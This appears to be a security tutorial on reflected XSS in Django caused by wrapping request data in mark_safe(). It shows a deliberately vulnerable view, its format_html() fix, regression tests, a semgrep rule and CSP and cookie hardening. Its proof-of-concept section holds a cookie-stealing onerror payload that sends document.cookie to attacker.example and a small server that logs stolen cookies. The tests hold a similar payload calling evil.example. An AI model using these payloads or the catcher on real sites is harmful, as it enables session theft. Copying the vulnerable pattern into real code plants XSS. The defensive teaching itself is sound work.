Real-World CVE XSS Exploit in Django Template Engine
A Django app with autoescape enabled gets XSS. The team can't figure out how — the template engine is supposed to escape everything by default. What they missed: a single mark_safe() call in a view utility function, written three years ago to render "trusted" notification banners, now handles a code path that feeds in URL query parameters. The attacker sends a crafted link to a support rep, the rep clicks it while authenticated, and the session cookie is gone. This is the anatomy of that class of bug.
How the Django Template XSS Bug Works
The Django template engine escapes output by default. When a string flows from a Python view into a template variable, Django's autoescaping converts <, >, ", ', and & into their HTML entity equivalents before rendering. The protection breaks the moment tainted data ends up inside a string that was marked safe before reaching the template.
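You can see the encoding directly with django.utils.html.escape(), the primitive that autoescaping applies under the hood (entity choices shown as on recent Django versions, where the apostrophe becomes &#x27;):

from django.utils.html import escape

print(escape('<b onclick="x(\'y\')">&</b>'))
# &lt;b onclick=&quot;x(&#x27;y&#x27;)&quot;&gt;&amp;&lt;/b&gt;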
Django itself has shipped fixes for related boundary failures. CVE-2021-45116 is an information-disclosure bug in the dictsort template filter, where crafted sort keys leveraged the engine's variable resolution to reach values the developer assumed were private. CVE-2020-13254 is another broken safety assumption: malformed memcached cache keys slipped past Django's key validation and could leak data across cache entries. Neither is the mark_safe() bug itself, but both share its shape: attacker-controlled values crossing a boundary the framework was trusted to police. The application-level version recurs constantly. A string built from trusted content gets concatenated or formatted with untrusted content, the combined result is wrapped in mark_safe(), and because the result is now a SafeString, autoescaping never fires.
From an exploitation standpoint (the advanced XSS exploitation techniques deep-dive covers payload craft in depth), the interesting part is not the payload itself. It's how SafeString behaves when it meets string formatting and concatenation.
Here's the vulnerable pattern:
# views.py
from django.utils.safestring import mark_safe
from django.shortcuts import render

def search_results(request):
    query = request.GET.get("q", "")
    # Original intent: wrap the query in a <strong> tag for display.
    # The developer assumed query was always plain text from a search box.
    # No one audited this when a new "deep link" feature started passing
    # HTML fragments through the q= parameter.
    highlighted = mark_safe(f"Results for: <strong>{query}</strong>")
    return render(request, "search.html", {"highlighted": highlighted})
<!-- search.html -->
{% load static %}
<!DOCTYPE html>
<html>
<body>
  <!-- autoescape is ON by default, but highlighted is already a SafeString.
       Django will not re-escape it. The SafeString contract says:
       "I promise this is already safe." That promise was broken in the view. -->
  <p>{{ highlighted }}</p>
</body>
</html>
mark_safe() returns a SafeString instance. When Django's template engine encounters a SafeString, it skips escaping entirely. The |safe filter does the same thing — it casts to SafeString at the template layer. Either way, if the string contains attacker-controlled content, you have reflected XSS.
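You can watch the skip happen in isolation. This sketch configures a bare template engine purely for demonstration (a standalone script, not app code):

import django
from django.conf import settings

settings.configure(TEMPLATES=[{"BACKEND": "django.template.backends.django.DjangoTemplates"}])
django.setup()

from django.template import Context, Template
from django.utils.safestring import mark_safe

t = Template("<p>{{ v }}</p>")
print(t.render(Context({"v": "<script>x</script>"})))
# <p>&lt;script&gt;x&lt;/script&gt;</p>  (plain str: autoescape fired)
print(t.render(Context({"v": mark_safe("<script>x</script>")})))
# <p><script>x</script></p>  (SafeString: escaping skipped)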
The f"Results for: <strong>{query}</strong>" line is the failure point. The trusted HTML (<strong>) and the untrusted data (query) are concatenated inside an f-string before mark_safe() is applied. By the time mark_safe() wraps the result, the attacker's payload is already embedded in the string with no escape opportunity left.
Patching the Vulnerable Template Code
The fix is format_html(). It's Django's purpose-built function for composing HTML strings from mixed trusted and untrusted inputs: it escapes every positional and keyword argument while leaving the format string — which must be a literal you control — as-is.
# views.py — fixed
from django.utils.html import format_html
from django.shortcuts import render

def search_results(request):
    query = request.GET.get("q", "")
    # format_html escapes every argument before interpolation.
    # The format string itself is a trusted literal, not user input.
    # If you need to compose more complex HTML, use format_html_join().
    highlighted = format_html("Results for: <strong>{}</strong>", query)
    return render(request, "search.html", {"highlighted": highlighted})
<!-- search.html — no changes needed; template stays the same.
     format_html() returns a SafeString, but one that was built safely.
     The template's autoescape handles any other context variables normally. -->
{% load static %}
<!DOCTYPE html>
<html>
<body>
  <p>{{ highlighted }}</p>
</body>
</html>
Before/after in one line:
# Before (vulnerable)
highlighted = mark_safe(f"Results for: <strong>{query}</strong>")
# After (safe)
highlighted = format_html("Results for: <strong>{}</strong>", query)
If you absolutely must escape a value manually — say you're building a helper that conditionally wraps content — use conditional_escape(), not escape(), because conditional_escape() is a no-op on already-safe strings, preventing double-escaping:
from django.utils.html import conditional_escape, format_html

def wrap_if_nonempty(value, tag="span"):
    # conditional_escape handles both str and SafeString inputs correctly.
    # Passing a SafeString to escape() would double-escape it.
    safe_value = conditional_escape(value)
    if not safe_value:
        return ""
    return format_html("<{tag}>{value}</{tag}>", tag=tag, value=safe_value)
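A quick sanity check of the helper (hypothetical inputs; outputs follow Django's escaping rules):

wrap_if_nonempty("<em>hi</em>")
# '<span>&lt;em&gt;hi&lt;/em&gt;</span>'  (plain str input: escaped)
wrap_if_nonempty(format_html("<em>{}</em>", "hi"))
# '<span><em>hi</em></span>'  (already-safe input: not double-escaped)
wrap_if_nonempty("")
# ''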
The one tradeoff: format_html() only accepts positional or keyword arguments as the escapable slots. You cannot pass a list into it directly; for that, use format_html_join(). Teams sometimes reach back for mark_safe() when they need a loop, which opens the hole again.
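As a sketch of the loop case (the comments list here is hypothetical), format_html_join() takes a separator, a format string, and an iterable of argument tuples, and escapes every tuple element:

from django.utils.html import format_html_join

comments = ["first!", "<script>alert(1)</script>", 'has "quotes"']
html = format_html_join("\n", "<li>{}</li>", ((c,) for c in comments))
# <li>first!</li>
# <li>&lt;script&gt;alert(1)&lt;/script&gt;</li>
# <li>has &quot;quotes&quot;</li>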
Building the Proof-of-Concept Payload
Against the vulnerable view, the exploit is a single crafted URL. No authentication needed, no stored state, no interaction beyond the victim loading the link.
# Confirming raw reflection first — does the tag survive?
curl -s "http://localhost:8000/search/?q=<script>alert(1)</script>" | grep -i script
# Expected output from the vulnerable app:
# <p>Results for: <strong><script>alert(1)</script></strong></p>
For session theft, replace the script tag with an out-of-band exfiltration payload:
http://localhost:8000/search/?q=<img src=x onerror="fetch('https://attacker.example/c?d='+encodeURIComponent(document.cookie))">
The rendered DOM on the victim's browser:
<p>Results for: <strong><img src=x onerror="fetch('https://attacker.example/c?d='+encodeURIComponent(document.cookie))"></strong></p>
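One note on delivery: the q= value above is shown decoded for readability. In a real crafted link the payload is URL-encoded first, which a few lines of Python can do (attacker.example is a placeholder, as above):

from urllib.parse import quote

payload = ('<img src=x onerror="fetch(\'https://attacker.example/c?d=\''
           '+encodeURIComponent(document.cookie))">')
print("http://localhost:8000/search/?q=" + quote(payload))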
The src=x triggers an immediate load failure, which fires onerror. document.cookie at this point contains every non-HttpOnly cookie on the Django session domain. If SESSION_COOKIE_HTTPONLY = False (Django's default is True, but teams do disable it), the attacker gets the session ID in the exfil request's query string.
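On the receiving side, anything that logs query strings works. A minimal lab-only catcher (hypothetical port, for use against your own test instance):

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class Catcher(BaseHTTPRequestHandler):
    def do_GET(self):
        # The stolen cookie arrives in the d= parameter of the exfil request.
        stolen = parse_qs(urlparse(self.path).query).get("d", [""])[0]
        print("exfiltrated:", stolen)
        self.send_response(204)  # empty response, nothing visible to the victim
        self.end_headers()

HTTPServer(("0.0.0.0", 8080), Catcher).serve_forever()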
Understanding how XSS abuses browser storage is worth the time here — tokens stored in localStorage or non-HttpOnly cookies are fully readable by this payload with no additional tricks.
The impact scales with the victim's privilege level. If a support agent or admin loads this link, the attacker inherits their session. If the Django app uses django-allauth or a similar SSO integration, the blast radius extends to connected services.
Why Autoescape Alone Did Not Save You
Django's autoescape is an output encoding layer, not an input filter. It works by checking whether a string is an instance of SafeString before rendering. If it is, escaping is skipped. mark_safe(), the |safe filter, and direct SafeString() construction all produce instances that will pass through unescaped.
The propagation behavior is the part that surprises people:
String concatenation breaks the safety boundary. Concatenating a SafeString with a plain str yields a plain str, and autoescape will fire on that result. f-strings and % formatting likewise return plain str. The trap is the pattern from the vulnerable view: format first, then wrap the combined result in mark_safe(), which stamps the whole string, attacker payload included, as safe:
from django.utils.safestring import mark_safe

safe = mark_safe("<b>hello</b>")
user_input = "<script>alert(1)</script>"

# Case 1: plain concatenation -> str -> autoescape fires -> safe
result1 = safe + user_input
print(type(result1))  # <class 'str'> — autoescape will escape this

# Case 2: mark_safe() around the formatted result -> SafeString -> no escape
result2 = mark_safe(f"{safe} {user_input}")
print(type(result2))  # <class 'django.utils.safestring.SafeString'> — NOT escaped
Case 2 is exactly the vulnerable pattern in the view above. The mark_safe() wraps the f-string result, not the individual pieces.
The |safe filter in templates is just as dangerous as mark_safe() in views. Reviewers often focus on Python files and miss:
<!-- This escapes nothing. attacker_value renders raw. -->
{{ attacker_value|safe }}
{% autoescape off %} blocks propagate into includes. If a base template or inclusion tag disables autoescape, every child template rendered inside that block inherits the off state. This is a common gotcha with legacy template hierarchies where someone disabled autoescape "temporarily" in a wrapper and never re-enabled it. Variables in {% include "partial.html" %} inside an {% autoescape off %} block will not be escaped even if the partial itself does not set autoescape explicitly.
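This is easy to verify in isolation with the in-memory template loader (template names here are hypothetical; a standalone sketch):

import django
from django.conf import settings

settings.configure(TEMPLATES=[{
    "BACKEND": "django.template.backends.django.DjangoTemplates",
    "OPTIONS": {"loaders": [
        ("django.template.loaders.locmem.Loader", {
            "partial.html": "{{ attacker_value }}",
            "base.html": "{% autoescape off %}{% include 'partial.html' %}{% endautoescape %}",
        }),
    ]},
}])
django.setup()

from django.template.loader import render_to_string

print(render_to_string("base.html", {"attacker_value": "<script>x</script>"}))
# <script>x</script>  (the off state propagated into the include)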
Inclusion tags that return SafeString from Python bleed into the template context. A @register.simple_tag that returns a mark_safe() value bypasses autoescape entirely when rendered in the template, even with autoescape on.
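The contrast in tag form, as a sketch (the banners module and tag names are hypothetical):

# templatetags/banners.py
from django import template
from django.utils.html import format_html
from django.utils.safestring import mark_safe

register = template.Library()

@register.simple_tag
def banner_unsafe(message):
    # Returns a SafeString: renders raw in the template even with autoescape on.
    return mark_safe(f"<div class='banner'>{message}</div>")

@register.simple_tag
def banner_safe(message):
    # format_html escapes message; the wrapper markup stays a trusted literal.
    return format_html("<div class='banner'>{}</div>", message)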
Code Review Checklist for Django Templates
Every instance of mark_safe, |safe, SafeString, and {% autoescape off %} in a Django codebase is a security decision that needs a written justification. When reviewing a PR, treat any of these as requiring the same rigor as a direct SQL query.
Grep the entire repo in one pass:
# Surface all mark_safe, |safe, SafeString, autoescape off, and format_html
# usages in Python and HTML files. Pipe to less for review.
rg --type py --type html \
  -e 'mark_safe' \
  -e '\|safe' \
  -e 'SafeString' \
  -e 'autoescape off' \
  -e 'format_html' \
  --stats
For each hit, answer these questions before approving:
- Is the input ever attacker-reachable? Trace the data back to its source. If it touches request.GET, request.POST, request.META, a database field populated from user input, or a third-party API, it is tainted.
- If format_html is used, are all variable interpolations passed as arguments (not in the format string)? format_html("Hello, " + name) is still broken — the format string must be a literal.
- If mark_safe is used, is this the only place that string can be created? If other code paths can produce the same variable, each one needs the same audit.
- Does the {% autoescape off %} block have a documented reason? Add a comment inline: {# autoescape off: rendering pre-escaped HTML from email template builder — input validated at creation time #}.
The XSS code review guide on Code Review Lab has a full taint-tracking walkthrough that complements this checklist, especially for cases where data flows through multiple serialization layers before hitting the template.
Semgrep rule to add to your CI config:
# semgrep-rules/django-mark-safe.yml
rules:
  - id: django-mark-safe-with-request-data
    patterns:
      - pattern: mark_safe(...)
      - pattern-either:
          - pattern: mark_safe($REQUEST.GET.get(...))
          - pattern: mark_safe($REQUEST.POST.get(...))
          - pattern: mark_safe(f"...{$REQUEST.GET.get(...)}...")
    message: "mark_safe called with request-derived data — this is XSS."
    languages: [python]
    severity: ERROR
Detecting Regressions With Tests and CI
Static analysis catches patterns, but tests catch behavior. Add a test that sends a known XSS payload and asserts it was escaped in the response body.
# tests/test_xss_escaping.py
import pytest
from django.test import Client
from django.urls import reverse

@pytest.mark.django_db
class TestSearchXSSEscaping:
    def setup_method(self):
        self.client = Client()

    def test_script_tag_is_escaped_in_search_results(self):
        payload = "<script>alert(document.cookie)</script>"
        response = self.client.get(reverse("search_results"), {"q": payload})
        body = response.content.decode("utf-8")
        # The literal string must never appear — if it does, the browser executes it.
        assert "<script>" not in body, (
            "Raw <script> tag found in response — autoescape is broken."
        )
        # The escaped form must be present — proves the value was rendered, not dropped.
        assert "&lt;script&gt;" in body, (
            "&lt;script&gt; not found — value may have been silently dropped rather than escaped."
        )

    def test_img_onerror_payload_is_escaped(self):
        payload = '<img src=x onerror="fetch(\'//evil.example\')">'
        response = self.client.get(reverse("search_results"), {"q": payload})
        body = response.content.decode("utf-8")
        # Escaping turns the quote into &quot;, so the raw attribute never survives.
        # (Checking for bare "onerror=" would false-fail: that substring also
        # appears in the correctly escaped output.)
        assert 'onerror="' not in body
        assert "&lt;img" in body

    def test_safe_html_in_response_is_structured_correctly(self):
        # Sanity check: legitimate query still renders inside <strong> tags.
        response = self.client.get(reverse("search_results"), {"q": "hello world"})
        body = response.content.decode("utf-8")
        assert "<strong>hello world</strong>" in body
Run these in CI on every PR that touches views, templates, or template tags. If a mark_safe regression lands in this view, test_script_tag_is_escaped_in_search_results catches it immediately — before it reaches staging.
Add Bandit to your pipeline for the Python-side check:
# bandit flags mark_safe calls; combine with the semgrep rule above
bandit -r . -t B703,B308 --severity-level medium
B703 is Bandit's Django-specific check for mark_safe; B308 flags mark_safe through the general call blacklist. Neither replaces taint analysis, but both are fast enough to run on every commit.
Hardening Beyond the Template Layer
Fixing the template is necessary but not sufficient. If another mark_safe slip lands in a codebase a year from now, you want defense layers that limit the damage.
Content Security Policy with nonces. A strict CSP blocks inline script execution even if an attacker injects a <script> tag. Configure Django with django-csp:
# settings.py (django-csp 3.x settings style)
CSP_DEFAULT_SRC = ("'self'",)
CSP_SCRIPT_SRC = ("'self'",)
CSP_INCLUDE_NONCE_IN = ["script-src"]  # middleware appends a per-request nonce
CSP_STYLE_SRC = ("'self'",)
CSP_IMG_SRC = ("'self'", "data:")
CSP_OBJECT_SRC = ("'none'",)
CSP_BASE_URI = ("'none'",)  # Blocks base tag injection for relative URL hijacking
A nonce-based CSP stops the injected <script> execution path. It also blocks the onerror= payload: browsers refuse inline event handler attributes under any script-src that omits 'unsafe-inline', and nonces never apply to attributes ('unsafe-hashes' exists only to re-allow specific handler strings, so avoid it). Trusted Types (available in Chromium-based browsers) blocks DOM injection sinks directly and is worth evaluating if your audience is Chrome-heavy.
HttpOnly and SameSite cookies. Verify these in settings.py:
SESSION_COOKIE_HTTPONLY = True # Blocks document.cookie access from JS
SESSION_COOKIE_SAMESITE = "Lax" # Blocks cross-site request forgery vectors
CSRF_COOKIE_HTTPONLY = True
CSRF_COOKIE_SAMESITE = "Strict"
SameSite=Lax prevents the session cookie from being sent on cross-origin POST requests but still allows top-level navigations, which is what the attacker's crafted link relies on. SameSite=Strict is stronger but breaks OAuth redirect flows. Know which one your app can tolerate.
Trusted Types. Add the header alongside CSP:
Content-Security-Policy: require-trusted-types-for 'script';
Trusted Types turns DOM XSS sinks (innerHTML, document.write, etc.) into typed APIs. Untrusted string assignment to these sinks raises a TypeError in supported browsers, making the onerror fetch payload harder to chain into persistent DOM injection even if reflection happens.
These controls are not replacements for fixing the template layer. They are the net underneath the trapeze.
Further Reading
- Advanced XSS exploitation techniques — Code Review Lab's deep-dive on exploitation chains beyond basic reflection, including DOM-based and mutation XSS.
- XSS code review guide — taint-tracking methodology and PR review patterns for finding XSS in Python web frameworks.
- OWASP Cross Site Scripting Prevention Cheat Sheet — the canonical reference for output encoding rules by context (HTML body, attribute, JavaScript, CSS, URL).
- Django security docs: cross site scripting protection — Django's own documentation on what autoescape does and does not protect against.
- CVE-2021-45116 NVD entry — the Django CVE referenced above; read the patch diff to see how the Django team restricted dictsort's variable resolution in the template engine internals.
The single most reliable control in this class of bug is a team norm: mark_safe() never touches data that has not passed through format_html() or conditional_escape() first, and every use gets a comment explaining what made the input safe. If your codebase has more than a handful of mark_safe calls without those comments, that's where to spend the next hour. The application security engineer's playbook on Code Review Lab has a structured process for working through exactly this kind of legacy-code audit at scale.